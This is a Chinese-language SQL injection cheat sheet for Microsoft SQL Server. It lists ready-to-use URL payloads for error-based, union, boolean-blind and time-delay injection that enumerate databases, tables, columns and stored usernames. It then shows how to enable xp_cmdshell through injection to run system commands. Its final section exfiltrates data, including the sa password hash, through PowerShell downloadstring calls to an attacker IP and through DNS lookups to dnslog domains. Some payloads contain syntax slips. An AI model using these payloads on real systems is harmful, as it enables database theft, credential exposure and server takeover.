端口:1433

Master数据库:

控制SQL Server的所有方面,这个数据库中包括所有的配置信息、用户登录信息、当前正在服务器中运行的过程的信息等

管理员账号:sa

一、基本语句

操作 语句
创建数据库 create databases [dbname]
删除数据库 drop database [dbname]
创建新表 create table [tablename] (name char(10),age tinyint,sex int)
删除新表 drop table [tablename]
向表中插入内容 insert into tablename values(value1,value2)
删除内容 delete from [tablename] where 范围
查找 select * from [tablename] where field1=""

判断是否为mssql数据库 (返回正常是mssql,不正常为access)

?id=1' and  1<(select count(*) from sysobjects) --  ?id=1' and  exists (select * from sysobjects) --

二、报错注入

操作 语句
判断注入点 1’ and 1=1 返回正常
1’ and 1=0 返回错误
利用数字和字符不能比较(字符发生强制类型转换错误)
注:=号可换为<、>,低版本mssql使用=可能会报错
显示数据库版本 ?id=1' and 1<(select @@version) --
显示当前数据库名字 ?id=1' and 1<(select db_name()) --
显示当前数据库连接的用户 ?id=1' and 1<(select user_name()) --
判断当前数据库连接用户的权限
页面正常为sysadmin权限		 ?id=1' and 1=(select is_srvrolemember('sysadmin')) --
权限有:
sysadmin、serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin
注:
and 1=(select is_member('db_owner')) --
判断是否为db_owner权限,可通过备份方式向网站写文件
获取数据库数量 当数据类型为int类型时,无法触发强制类型转换,因此需要结合convert和cast as

?id=1' and 1<char(126)%2b(select cast(count(*) as nvarchar(4000)) from master.dbo.sysdatabases)%2bchar(126) --

使用convert
?id=1' and 1<convert(int, char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from master.dbo.sysdatabases)%2bchar(126)) --

或使用二分法
?id=1' and 1<(select count(db_name) from master.dbo.sysdatabases) --
获取数据库名称 1' and 1<(select top 1 name from master.dbo.sysdatabases where name not in (select top 0 name from master.dbo.sysdatabases)) --
第二个top 1中的1为查第几个表,意为取前几个,这里使用了逻辑嵌套法,下同
判断数据库的表数量 ?id=1' and 1<char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from information_schema.tables)%2bchar(126) --

?id=1' and 1<convert(int, char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from information_schema.tables)%2bchar(126)) --

二分法
?id=1' and 1<(select count(table_name) from information_schema.tables) --
获取表名称 ?id=1' and 1<(select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables)) --
获取列的数量 ?id=1 and 1<char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from information_schema.columns where table_name='tbname')%2bchar(126)--

?id=1 and 1<convert(int,char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from information_schema.columns where table_name='tbname')%2bchar(126)) --

二分法
?id=1' and 1<(select count(column_name) from information_schema.columns where table_name = 'tbname') --
获取列名 ?id=1' and 1<(select top 1 column_name from information_schema.columns where table_name = 'tbname' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'tbname')) --
获取数据数量 ?id=1 and 1<char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from tbname..users)%2bchar(126) --

?id=1 and 1<convert(int,char(126)%2b(select top 1 cast(count(*) as nvarchar(4000)) from tbname..users)%2bchar(126)) --

二分法
?id=1' and 1<(select count(username) from tbname..users) --
获取数据值 ?id=1' and 1<(select top 1 username from tbname..users where username not in (select top 0 username from tbname..users)) --

三、union联合查询

方法 语句
判断列数 ?id=1' order by 3 --
注: mssql union select 要求前后数据类型保持一致
1、用null代替显示位
2、带个替换null,确定数据类型
判断显示位 ?id=-1' union select 1,2,3 --
?id=1' union select null,null,null -- (判断时不要用此句,无显示)
获取数据库版本 ?id=-1' union select 1,@@version,3 --
获取当前数据库名称 ?id=-1' union select 1,db_name(),3 --
获取数据库数量 ?id=-1' union select 1,(select count(*) from master.dbo.sysdatabases),3 --
获取数据库名称 ?id=-1' union select 1,db_name(1),3 --
db_name()表示当前数据库,db_name(1)表示第一个数据库


?id=-1' union select top 1 1,name,3 from master.dbo.sysdatabases where name not in (select top 1 name from master.dbo.sysdatabases) --
获取表数量 ?id=-1' union select top 1 1,count(table_name),3 from information_schema.tables --
获取表名称 显示当前数据库下的表名
?id=-1' union select top 1 1,table_name,3 from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables) --

显示指定数据库下的表名
?id=-1' union select top 1 1,table_name,3 from information_schema.tables where table_name not in (select top 1 table_name from dbname.information_schema.tables) --
获取列数量 ?id=-1' union select top 1 1,count(column_name),3 from information_schema.columns --

获取指定表中的字段数量
?id=-1' union select top 1 1,count(column_name),3 from information_schema.columns where table_name='users' --
获取列名 ?id=-1' union select top 1 1,table_name,3 from information_schema.columns where table_name not in (select top 0 table_name from information_schema.tables) --

指定表获取字段
?id=-1' union select top 1 column_name,2 from information_schema.columns where table_name='users' and column_name not in (select top 0 column_name FROM information_schema.columns where table_name = 'users')) --
获取数据数量 ?id=-1' union select top 1 1,count(username),3 from test..users --
获取数据值 ?id=-1' union select top 1 username from test..users where username not in (select top 0 username from test..users) --

四、Bool盲注(二分法)

方法 语句
判断 ?id=1' and 1=1 – ?id=1' and 1=0 --
判断数据库版本长度 ?id=1' and 1<len(@@version)--
判断数据库版本名称 ?id=1' and 1<ascii(substring(@@version,1,1)) --
判断当前数据库长度 ?id=1' and 1<len(db_name()) --
判断当前数据库名称 ?id=1' and 1<ascii(substring(db_name(),1,1)) --
判断数据库数量 ?id=1' and 1<(select count(*) from master.dbo.sysdatabases) --
逐个判断数据库长度 ?id=1' and 1<len((select top 1 name from master.dbo.sysdatabases where name not in (select top 0 name from master.dbo.sysdatabases))) --
逐个判断数据库名称 ?id=1' and 1<ascii(substring((select top 1 name from master.dbo.sysdatabases where name not in (select top 0 name from master.dbo.sysdatabases)),1,1)) --
判断表数量 ?id=1' and 1<(select count(table_name) from information_schema.tables) --
逐个判断表长 ?id=1' and 1<len((select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables))) --
逐个判断表名 ?id=1' and 1<ascii(substring((select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables)),1,1)) --
判断列数 ?id=1' and 1<(select count(column_name) from information_schema.columns where table_name='tbname') --
逐个判断列的长度 ?id=1' and 1<len((select top 1 column_name from information_schema.columns where table_name = 'tbname' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'tbname'))) --
逐个判断列名 ?id=1' and 1<ascii(substring((select top 1 column_name from information_schema.columns where table_name = 'tbname' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'tbname')),1,1)) --
判断数据数量 ?id=1' and 1<(select count(username) from dbname..tbname) --
逐个判断数据长度 ?id=1' and 1<len((select top 1 username from tbname..users where username not in (select top 0 username from tbname..users))) --
逐个判断数据值 ?id=1' and 1<ascii(substring((select top 1 username from tbname..users where username not in (select top 0 username from tbname..users)),1,1)) --

五、时间延时盲注

方法 语句
判断数据库版本长度 ?id=1' if(len(@@version)>1) waitfor delay '0:0:3' --
判断数据库版本名 ?id=1' if(ascii(substring(@@version),1,1)>1) waitfor delay '0:0:3' --
判断当前数据库长度 ?id=1' if(len(db_name())>1) waitfor delay '0:0:3' --
判断当前数据库名称 ?id=1' if(ascii(db_name())>1) waitfor delay '0:0:3' --
判断数据库数量 ?id=1' if((select count(*) from master.dbo.sysdatabases)>1) waitfor delay '0:0:3'--
逐个判断数据库长度 ?id=1' if(len((select top 1 name from master.dbo.sysdatabases where name not in (select top 0 name from master.dbo.sysdatabases)))>1) waitfor delay '0:0:3' --
逐个判断数据库名 ?id=1' if(ascii(substring((select top 1 name from master.dbo.sysdatabases where name not in (select top 0 name from master.dbo.sysdatabases)),1,1))>1) waitfor delay '0:0:3' --
判断表数量 ?id=1' if((select count(table_name) from information_schema.tables)>1) waitfor delay '0:0:3'--
逐个判断表长度 ?id=1' if((select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables))>1) waitfor delay '0:0:3'--
逐个判断表名 ?id=1' if(ascii(substring((select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables)),1,1))>1) waitfor delay '0:0:3'--
判断列数 ?id=1' if((select count(column_name) from information_schema.columns where table_name='tbname')>1) waitfor delay '0:0:3'--
逐个判断列长 ?id=1' if((select top 1 column_name from information_schema.columns where table_name = 'tbname' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'tbname'))>1) waitfor delay '0:0:3'--
逐个判断列名 ?id=1' if(ascii(substring((select top 1 table_name from information_schema.columns where column_name not in (select top 1 column_name from information_schema.columns)),1,1))>1) waitfor delay '0:0:3'--
判断数据数量 ?id=1' if((select count(username) from tbname..users)>1) waitfor delay '0:0:3' --
逐个判断数据长度 ?id=1' if(len((select top 1 username from tbname..users where username not in (select top 0 username from tbname..users)))>1) waitfor delay '0:0:3' --
逐个判断数据值 ?id=1' if(ascii(substring((select top 1 username from tbname..users where username not in (select top 0 username from tbname..users)),1,1))>1) waitfor delay '0:0:3'--

六、命令执行

xp_cmdshell 默认关闭状态/管理员才可以开启

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE;

EXEC sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

开启xp_cmdshell功能

?id=1'; EXEC sp_configure 'show advanced options', 1;--

?id=1'; RECONFIGURE;--

?id=1'; EXEC sp_configure 'xp_cmdshell',1--

?id=1'; RECONFIGURE--

验证xp_cmdshell功能

?id=1'; exec master..xp_cmdshell 'ping -n 10 127.0.0.1' --

用sql注入,来获取命令执行结果

1、创建一个表,再把命令执行的结果,写入到表中。

`?id=1'; create table sqldata(result VARCHAR(8000)); --`

2、执行命令,并且把结果写入表中

方法 语句
直接写入 ?id=1';INSERT INTO sqldata (result) EXEC master..xp_cmdshell 'net user'--
转换一下 ?id=1';DECLARE @adqa VARCHAR(8000);SET @adqa=0x6970636F6E666967202F616C6C;INSERT INTO sqldata(result) EXEC master..xp_cmdshell @adqa--

七、DNS外带

方法 语句
字符型外带–指定ip端口 ?id=1;DECLARE @a varchar(8000);SET @a=(SELECT TOP 1 master.dbo.fn_varbintohexstr(CONVERT(varbinary,name)) from Master.dbo.SysDatabases);exec('master..xp_cmdshell "powershell IEX (new-object net.webclient).downloadstring("http://172.16.12.187:9008/?data='%2b @a %2b' ")"' ) --
数字型外带–指定ip端口 ?id=1;DECLARE @a VARCHAR(8000);SET @a=(SELECT TOP 1 substring(@@version,1,35));exec('master..xp_cmdshell "powershell IEX (new-object net.webclient).downloadstring("http://172.16.12.187:9008/?data='%2b @a %2b' ")"' ) --
字符型外带–dnslog平台*** ?id=1';declare @a varchar(1024);set @a=db_name();exec('master..xp_dirtree "//'%2B @a %2B'.dnslog.io"')--
数字型外带–dnslog平台 ?id=1; declare @a varchar(1024);set @a=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa'); exec('master..xp_cmdshell "ping -n 2' %2b @a %2b '.dnslog.com' ")--

http外带需要监听http端口(python -m http.server 9008)